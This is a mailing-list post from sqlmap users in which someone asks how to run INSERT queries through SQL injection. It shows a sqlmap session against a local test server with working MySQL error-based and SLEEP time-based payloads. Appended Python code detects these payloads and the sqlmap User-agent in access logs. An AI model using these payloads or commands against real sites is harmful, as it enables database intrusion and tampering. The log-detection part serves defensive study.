[sqlmap-users] insert via injection
From: Kirill M. <l0...@l0...> - 2011-05-01 19:34:50
Hi, is it possible to make "insert/update" queries via SQL injection bugs? I tried on my test machine via "--sql-query", but I didn't see the query in request_uri:

(admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev) $ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log --sql-query="insert into users set user='aaa',pass='bbb';"

    sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 21:07:53

[21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as session file
[21:07:53] [INFO] resuming injection data from session file
[21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[21:07:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[21:07:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
do you want to retrieve the SQL statement output? [Y/n/a]
[21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into users set user='aaa',pass='bbb';'
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
insert into users set user='aaa',pass='bbb'; [2]:
[*] None

[21:07:54] [INFO] Fetched data logged to text files under '/home/admin/sqlmap-dev/output/10.0.0.60'

[*] shutting down at: 21:07:54

(admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev) $ cat t3.log
HTTP request [#1]:
GET /sql/user.php?id=1 HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.60
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
Connection: close

HTTP response [#1] (200 OK):
Content-length: 949
X-powered-by: PHP/5.1.6
Uri: http://10.0.0.60:80/sql/user.php?id=1
Server: Apache/2.2.3 (CentOS)
Connection: close
Date: Tue, 26 Apr 2011 19:07:53 GMT
Content-type: text/html; charset=UTF-8

HTTP_ACCEPT_ENCODING => identity
HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
HTTP_CONNECTION => close
HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
HTTP_HOST => 10.0.0.60
HTTP_PRAGMA => no-cache
HTTP_CACHE_CONTROL => no-cache,no-store
PATH => /sbin:/usr/sbin:/bin:/usr/bin
SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port 80</address>
SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
SERVER_NAME => 10.0.0.60
SERVER_ADDR => 10.0.0.60
SERVER_PORT => 80
REMOTE_ADDR => 10.0.0.60
DOCUMENT_ROOT => /var/www/html
SERVER_ADMIN => root@localhost
SCRIPT_FILENAME => /var/www/html/sql/user.php
REMOTE_PORT => 41083
GATEWAY_INTERFACE => CGI/1.1
SERVER_PROTOCOL => HTTP/1.1
REQUEST_METHOD => GET
QUERY_STRING => id=1
REQUEST_URI => /sql/user.php?id=1
SCRIPT_NAME => /sql/user.php
PHP_SELF => /sql/user.php
REQUEST_TIME => 1303844873
ok
############################################################################

--
Kirill Morozov
KIMO2-RIPE, RHCE
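The session above shows two things a web-server log would record about this kind of testing: the tool's own User-agent string and the two payload shapes sqlmap reported for the id parameter (the FLOOR(RAND(0)*2) ... GROUP BY double-query trick and SLEEP(n)). The following is an added example, not part of this post or of sqlmap, that parses Apache/nginx "combined" access-log lines and flags requests matching those signatures. The log lines are constructed for the example; the signature names, the LOG_RE pattern and the helper functions are this example's own assumptions.

```python
"""Flag access-log requests that carry the sqlmap User-agent or the
MySQL error-based / time-based payload shapes seen in the session above.
Example code written for this page; log lines below are constructed."""
import re
from urllib.parse import unquote_plus

# Signature names are this example's own labels, derived from the payloads
# sqlmap reported for the id parameter in the post.
SIGNATURES = {
    "sqlmap-user-agent": re.compile(r"\bsqlmap/", re.I),
    "mysql-error-based-double-query": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "mysql-time-based-sleep": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "information-schema-reference": re.compile(r"\binformation_schema\.", re.I),
}

# Apache/nginx "combined" format:
# ip ident user [ts] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format log line; return a dict, or None if malformed."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    # Percent-decode the path so the SQL tokens are visible to the signatures.
    entry["decoded_path"] = unquote_plus(entry["path"])
    return entry


def classify(entry):
    """Return the names of all signatures that match this log entry."""
    hits = []
    for name, pattern in SIGNATURES.items():
        # The tool-fingerprint signature looks at the User-agent; the payload
        # signatures look at the decoded request path and query string.
        haystack = entry["ua"] if name == "sqlmap-user-agent" else entry["decoded_path"]
        if pattern.search(haystack):
            hits.append(name)
    return hits


def scan(lines):
    """Return (client ip, raw path, [signature names]) for every line that matched."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line: skip rather than crash the scan
        hits = classify(entry)
        if hits:
            findings.append((entry["ip"], entry["path"], hits))
    return findings


# Constructed sample log: one sqlmap-fingerprinted request, the two payload
# shapes from the session above sent with a browser User-agent, and a benign hit.
SAMPLE_LOG = [
    '10.0.0.60 - - [26/Apr/2011:21:07:53 +0200] "GET /sql/user.php?id=1 HTTP/1.1" '
    '200 949 "-" "sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)"',
    '10.0.0.60 - - [26/Apr/2011:21:07:55 +0200] "GET /sql/user.php?id=1%20AND%20'
    '(SELECT%201212%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,110,118,103,58),'
    '(SELECT%20(CASE%20WHEN%20(1212=1212)%20THEN%201%20ELSE%200%20END)),'
    'CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables'
    '%20GROUP%20BY%20x)a) HTTP/1.1" 200 1021 "-" "Mozilla/5.0"',
    '10.0.0.60 - - [26/Apr/2011:21:08:01 +0200] "GET /sql/user.php?id=1%20AND%20SLEEP(5) '
    'HTTP/1.1" 200 949 "-" "Mozilla/5.0"',
    '10.0.0.61 - - [26/Apr/2011:21:08:02 +0200] "GET /sql/user.php?id=2 HTTP/1.1" '
    '200 951 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {path[:60]}... -> {', '.join(hits)}")
```

The User-agent check is the weakest of the four (it is trivially changed with sqlmap's own options), so the payload-shape signatures are the ones worth keeping in a real ruleset; decoding the path before matching matters because the server logs the percent-encoded form.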